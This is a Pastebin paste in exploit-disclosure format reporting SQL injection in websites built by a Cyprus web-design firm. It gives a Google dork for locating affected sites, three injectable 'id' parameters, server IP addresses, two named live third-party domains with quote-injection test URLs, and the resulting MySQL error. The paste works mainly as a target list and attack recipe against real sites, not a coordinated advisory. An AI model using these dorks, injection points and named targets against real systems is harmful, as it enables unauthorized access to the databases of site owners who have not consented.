Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###############################################################
- # Exploit Title : İdeaSeven Web Design Cyprus SQL Injection Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 10/01/2019
- # Vendor Homepage : ideaseven.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''web design by ideaseven.com'' site:cy
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Cyberizm Exploit Reference Link :
- cyberizm.org/cyberizm-ideaseven-web-design-cyprus-sql-injection.html
- ###############################################################
- # SQL Injection Exploit :
- ***********************
- /link.php?id=[SQL Injection]
- /all_articles.php?id=[SQL Injection]
- /news_events.php?id=[SQL Injection]
- ###############################################################
- # Example Vulnerable Site :
- *************************
- Note : (46.249.205.44) => There are 95 domains hosted on this server.
- Note : (78.46.191.194) => There are 87 domains hosted on this server.
- [+] coucounislaw.com/link.php?id=207%27 =>
- [ Proof of Concept ] => archive.fo/Mpp0F
- [+] yiannakas.com/link.php?id=108%27
- ###############################################################
- # SQL Database Error :
- **********************
- You have an error in your SQL syntax; check the manual that
- corresponds to your MySQL server version for
- the right syntax to use near '\'' at line 1
- ###############################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###############################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement